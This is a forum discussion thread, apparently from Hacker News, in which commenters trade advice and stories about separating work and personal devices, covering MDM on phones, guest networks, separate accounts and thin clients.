If you use the same computer for work and home, then you may be able to create a user account for your work stuff and a different user account for your home stuff.
If you do consulting for multiple customers, then you may be able to create a different user account per customers, so there's some separation among your customers' information.
If you're able to use thin clients, then you may be able to create separate user accounts on the servers, so any files stay fully on the servers and never download to your local computer.
When you use multiple user accounts, you're having the operating system help separate things per account, such as each account's credentials, profiles, logins, histories, cookies, caches, etc.
OK. So my work laptop and phone only get access to the guest VLAN at home, where hosts are completely isolated from the default VLAN where my family's personal stuff lives. Now that I'm no longer on any on-call list the laptop gets powered down and the phone goes into a drawer by 18:00 every night. That's privacy and genuine work-life balance. Back in my younger days I saw too many colleagues lose everything because they couldn't resist "co-mingling" personal and business assets. It's _always_ a bad idea. As others here have pointed out, company asset risk systems have become increasingly more draconian -- for good reasons.
What do you mean "lose everything"? Do you mean they got fired for misusing work computers? Or do you mean they lost their data because the work computer was wiped?
Maybe it's sending personal texts or emails from your work phone, editing personal documents or photos on your work laptop, or joining a virtual happy hour with friends from your work tablet.
So... I agree with much of this article. However, the above is silly and undermines the point. Basically living with these devices should not be a concern any more than faxing personal health expense forms using the company fax machine. Or using the cheap pen from the office supply room anywhere.
Should you do projects with company resources? No. But that is not exactly a slippery slope. Don't pretend it is one.
On one hand, if a person is mindful and aware of their actions, they are likely to make thoughtful decisions about what is appropriate.
On the other hand, some habits form slowly. Sometimes bad habits creep in when you are in a hurry or lazy.
It depends on many factors. Many people find value in setting rules that seem too strict for others. Know yourself and choose accordingly and/or adapt to your workplace as necessary.
This is the slippery slope argument. My assertion is that we shouldn't, as a society, accept that some things are wrong. Such that that is the wrong argument to use here.
At large, I also think that this means some things can't be codified. Such that some activities are highly dependent on expected duties of the employee.
As an example, as a security guard, if on the job you think up a good movie script and get it written, I don't see any argument that you thought of it while at work compelling. Even if you jotted notes throughout the day. If you are a staff writer for a studio, I'm sure the case is different.
So the same here. It is not a slippery slope. Nor is it a uniform field. And, in general, I suspect I would side with individuals over corporations way more. Probably not exclusively, but predominantly.
Edit: not that I think your advice is bad, really.
> At large, I also think that this means some things can't be codified. Such that some activities are highly dependent on expected duties of the employee.
I'm pretty sure you mean "some things shouldn't be codified". I'm not trying simply to nitpick; I think using the word "should" signals very clearly that you are making a value judgment, not a judgment of what is possible.
Here's how I'm interpreting your words: "There are many employee behaviors that employers want to promote that are too nuanced or complex to codify". I have a lot of concerns with such a statement:
1. I've seen a lot of people make such a statement because they are unwilling and/or unable to design policies. Some people want perfection, and the messiness and complexity of the real world bothers them. Instead of embracing and managing this uncertainty, they retreat to the false dichotomy of "if we can't do it perfectly, we shouldn't try it at all".
2. I find the statement implies the wrong goal. The goal isn't perfection; rather, the goal is to make policies that *improve* relative to *the next best alternative*.
To design policies and assess performance toward such goals, I like to use a combination of systems thinking, probabilistic reasoning, and realistic models of human behavior.
This also depends on your role. If you have a leadership role, you will likely see that not designing and advocating for policies is an abdication of your responsibilities. In short, no matter how imperfect, you have to make a decision. To quote a movie title, you can't be neutral on a moving train.
Ah, completely agreed on my word choice being wrong there.
Agreed on doing things to try to move the needle in a better direction. I will disagree the minute things land in a "zero tolerance" bucket. Yes, there are easy straw men that can and should be burned down. Nuance and discretion abound, though.
So, I probably do not disagree with the method for making policies you are describing. I'm also probably more comfortable with the idea that many policies are ultimately to be questioned, as well.
> My assertion is that we shouldn't, as a society, accept that some things are wrong. Such that that is the wrong argument to use here.
I'm not sure I'm following how your comments got here. Do you intend to make the above broad assertion ("we shouldn't, as a society, accept that some things are wrong")? To put it another way, are you arguing in favor of moral relativism?
Sorry. I'm fine accepting that some things are wrong. I specifically meant the examples in question here. So, I did not mean that we shouldn't accept that any things are wrong. I do think we should be very picky on the things we accept as wrong, in and of themselves.
> I do think we should be very picky on the things we accept as wrong, in and of themselves.
An interesting point. Many of these assessments are arguably subconscious and/or inculcated.
Some philosophies aspire to as few fundamental guiding principles as possible. Such a structure tends to improve self-consistency.
Other philosophies allow a broader mix of principles, sometimes in tension, which require considerable subjective discussion to untangle. Perhaps one could say these philosophies value human discussion as a core principle from which meaning is constructed.
I am not up to date on philosophies. What little I have learned over the years has waned in my mind such that I don't trust I have it right.
That said "these philosophies value human discussion as a core principal" really resonates with me. I don't like policies that are designed to be enforced without the people involved interacting with each other in some form. Again, yes there are some straw men that we should burn down when they appear, but I have a hard time with policies pushed in a "zero tolerance" fashion.
The biggest barrier to this for people outside the US and Canada is phones. People need "real phone" functionality (voice+txt+mms) on one device, and Google Voice and Twilio don't do that for a sizeable percentage of the global population outside of the USD and Canada, so people either use one phone for everything or they have 2 phones. The BYOD and MDM around that is a security nightmare.
That's why I created BenkoPhone (currently Australia only :)
I now have three laptops, two iPads and two iPhones on my desk all day though. Which is a complete fucking pain. Some days I wish I did something else for a living.
Two years ago I was working for a corporation that asked us to install Teams on our phones (so they could bother us even on the weekend). In order to install Teams you have to install a Microsoft app that lets the account holder be the owner of the device (as the disclaimer of the app says). When I asked about this, HR told me that this if for the case my phone got stolen they could erase it remotely. Not a day goes by without me thanking God I left that place.
It's actually pretty standard practice, and it makes sense. If your phone gets stolen, and it has sensitive company data on it, then they need to ensure their data is wiped.
In the case of the Microsoft Company Portal app, and enrollment in InTune, a separate work enclave is created, at least today. The enclave is fully controlled by your company's InTune policies, but your personal enclave remains untouched. It's how MDM should be.
I don't think it makes sense at all. If they want to own my phone, they should give me one and not take the one that belongs to me and have all my personal stuff.
If I use my work laptop at home, I even put it in a separate guest WiFi. Since the introduction of an Endpoint Management system it essentially became an untrusted device.
These days I do almost all of my work on my personal desktop since it's so much faster and more pleasant than my work issued laptop. Funny enough, the main time I use the work laptop is to play Netflix while doing the dishes or folding laundry. So I'm sure it looks like I'm not doing anything at all. Laptops off for 3 days, I turn it on and go straight to Netflix. Oh well.
When we all had to work from home due to Covid, we were also encouraged to install MS Teams on our phones. But for that to work, we needed to install some other security crap on our phones. Initially just in the work profile, but eventually they decided they also needed to control my private profile.
I kicked everything off my phone. They can buy me a phone if they want to control it.
This is one of the reasons I'm starting to like thin client stuff for work. They've gotten pretty good even for large-screen GUI desktops, and if your "work laptop" is actually a different machine that's just open inside one app on your personal one, it is very easy to keep your personal stuff outside of that session.
I knew that guy who auto-forwarded personal mail to his work mail. Then once he went on leave he setup an auto-forward from his work email to his personal email. Problem was he forgot to turn-off his private email forwarded and created a fine infinite loop of forwards that effectively crashed the email server.
Never again, will I use work PC containing personal files. When I was fired few years ago, the employer seized the work laptop without giving me a chance to wipe out my personal stuff. It contained my personal notes and sensitive info which I'd not want to share with anyone. Since then, if I need to have my personal notes for my work PC, I always keep it in an encrypted veracrypt drive .
I know it's easier to have 2 laptops (one for work, one for personal stuff), but I can't ignore the convenience factor. For example, I have text notes on tech/programming that I have made since college, and I refer to it often while at work. It's easy to copy/paste in single laptop. Recently, I've been using Synergy so I can run 2 separate PC, so it does help a bit.
1. It starts with an anecdote about a CIA director in the mid 90s. Umm, yeah, if you have access to top secret info, I would be very careful about mixing work and personal content.
2. It talks about how much of a pain it can be if you have to wipe your personal data off your laptop when you return it. I may be somewhat unusual for the HN crowd but not for the population at large but virtually all the data I care about lives on a few cloud services, and backing up a few trivial files (like my updated zsh config) is easy.
I just always have one personal Chrome window for any personal stuff, and a separate Chrome window with my work account. Totally easy to keep things separated that way.
> Umm, yeah, if you have access to top secret info, I would be very careful about mixing work and personal content.
Don't think you don't have that. Do you work with any personal or internal company data? Do you have access to systems that contain them? I.e. Databases, Backup Servers, internal portals with company-only announcements ...
Sure, you probably don't work with data classified as top secret, but being implicated in the release of personal data or internal data, especially if it helps the competition or influences the stock price, will get you very quickly in really hot water.
> I may be somewhat unusual for the HN crowd but not for the population at large but virtually all the data I care about lives on a few cloud services
... as well as your local files (Dropbox & Co.), your browser cache and your OS cache. Maybe your password store. Just because the data is not mainly stored on your device does not mean that nobody will access it. Also, people do run data recoveries on these, especially when you did not have time to prepare for this ("This laptop is under investigation, we take it right now, please report to HR").
I use a personal AWS Workspace as my personal machine, that I can access from my work laptop. It's handy, although I wish the cost was lower. Does anyone have a better managed VDI suggestion?
I bought a used R710 server for $200 and put it in the basement. I can run a handful of Win10 or Linux VMs on it at the same time and remote desktop into each of them. Just used wired ethernet if you can for speed and keeping the wifi quiet.
Fair point. The server draws 185W @ idle and at my power cost it's about $15/month to run. Amortize the server hardware too and it's maybe $25/month
The server has 24 cores, 32GB/1TB, and I can't see what an equivalent AWS instance would cost monthly. But it's easily more than $25. The PowerPro (8vCPU 32/175) is $148 monthly.
What about iPhones? I was under the impression even with a company managed MDM profile installed, there’s a limit to how much they can see, like they can’t see messages or browsing history
It depends on the MDM. My works' MDM required full access to my phone. That is the MDM software was fully capable of wiping the full device (not just the MDM data store). IT promised they wouldn't/couldn't do that; yet the app required the permissions. So yeah, noped right out of that.
For what it's worth: the company (HR in particular) logs everything you do, so that in the unlikely case they need to justify firing you, they have ammunition. Even if it's unrelated to the real reason.
This is especially true of companies with sensitive contracts, data, or relationships where they have all kinds of reasons to want to cover their butts. They may intentionally ignore you doing something you shouldn't, just to silently build a case and keep it in a back pocket.
I have always wondered about this... here in the third world, students pretty much rely on Windows Education and Office 365 Education for all their Windows / Office needs, as the cost for these is too high. Yet, you don't actually "own" these as a student; they're managed by your IT department. So I was always curious if there are any implications / hidden traps.
I really do wish iOS had appropriate os-sanctioned containment for work apps. Like, I’m talking a switch I throw and springboard flips over and shows me another whole set of apps with different data. Similarly, I should be able to assign a SIM to each profile. That way, whatever required MDM is isolated to that profile and doesn’t touch personal stuff, guaranteed.
You can emulate the concept of flipping over / changing which apps are on the homescreen / notifications with the upcoming iOS 15 “focus” profile concept.
I'm experimenting with using AWS Workspaces. Given that I can do so much of my work using other AWS tools (and other cloud services) I don't need much power. I haven't tried this yet, but it appears that I could make a bundle for a base system, setup a client from a base and then create a new bundle for work with that client?
The company I work for is about 50 people. About 80% of the employees have a company issue laptop that they have free reign over and the other 20% opt to use/bring their own laptop. I'm in the latter camp, because I do blur my personal and work life, and there's no way they can seize my laptop should anything undue happen.
Sharing device is one thing, something i also see frequently is people using their work email address to register to various personal services. Login using 2FA SMS to your work phone number of course.
This can give you a really hard time of resetting services if you change work and can't carry the phone number with you.
*Sidenote: I see many a non-tech-users (family members ?) doing this, they use their ISP provided email for everything ! This goes well until you get shitty service and want to move ISPs or they go out of business. Looking at everyone in South Africa that is stucked with telkom or mweb mailboxes ! :D
I would love to do that, but my very old home PC died, after I started using it a lot more often while staying at home.
The replacement is on backorder now for 2 months and no firm shipping date has been given yet. There is a chip shortage, a global logistics backlog, etc.
I tend to try and keep a good separation between the two, but everytime I need to return it at the end of my employment, I make sure the user account and all relevant data is erased. Always feels a bit satisfying to return a a bare computer to the company.
That and the fact that I wanted to simplify my life led me to use by work laptop and phone for personal stuff. I feel great after I ditched my Linux Thinkpad that constantly required maintenance and personal time. Carrying 2 phones was getting on my nerves as well.
Of course, my employer is not strict about this and doesn’t care much. I realize other employers might see this otherwise.
I thought I'd be safe and boot into an os on an external ssd for non work related activities on my work hardware, but somehow it not boots to grub by default even without the ssd plugged in. :(
What do you all do to manage this? For example, do you take 2 laptops when you travel? What other habits make this practical?
Here's what I do, as a compromise. I know it exposes personal data.
* Any personal projects are managed in the cloud on an EC2 instance. Personal development is remote via SSH. Only local artifacts are ssh keys
* I have a separate chrome profile for personal. All personal activity is in that profile.
* With few exceptions, I avoid storing personal files on the device itself. Personal files go into the cloud / google drive.
I know that my cookies and browser history are being recorded, but I haven't yet found a reasonable way to avoid personal access on my work device.
Also just for practical reasons. When I shift to a new work laptop or reformat my current one for whatever reason I don't want to sift through docs and pictures I might lose.
My friend uses one computer for both personal and business but he owns the company. I’ve always wondered if that was prudent, perhaps separate accounts at least?
Separate computers? Sure. Separate phones? No. I have outlook installed in a little sandbox app (nine), and slack. My slack notifications are blocked. I don't want to have to charge and carry two separate phones every where I go.
I also refuse to install any software on my phone that I'm not comfortable with. For example, outlook wanted permissions to remote wipe my phone and a lot of other skeevy stuff. That's not going to happen. I've heard of some employers asking to install tracking applications on their employees phone, that wouldn't fly either.
I think one of the biggest risks to the employee is the CEO or anybody in power simply deciding to letting you go and suddenly taking your machine from you without notice while you're in the office.
Or a ransomware invading your work laptop and encrypting your stuff.
Or your creepy IT guy figuring out the stuff you post on amazon or having access to your nudes or whatever.
I made this mistake during my first internship and pretty much never did it again. I'm so glad because I would have performed even more poorly during WFH if I had.
It's remarkable to me how much this has improved my life. It took some getting used to, but when I'm working I focus better on work, and when I'm not I unplug. It seems obvious yet somehow leaving work behind at the end of the day escaped me before.
Also as someone who used to run an IT department, it's shocking the degree that some people fail to realize their work equipment is well works. Personal e-mail on your work laptop, I get it. Your entire collection of photography celebrating the human form in your folder of the company shared drive, why would anyone think that's a good idea?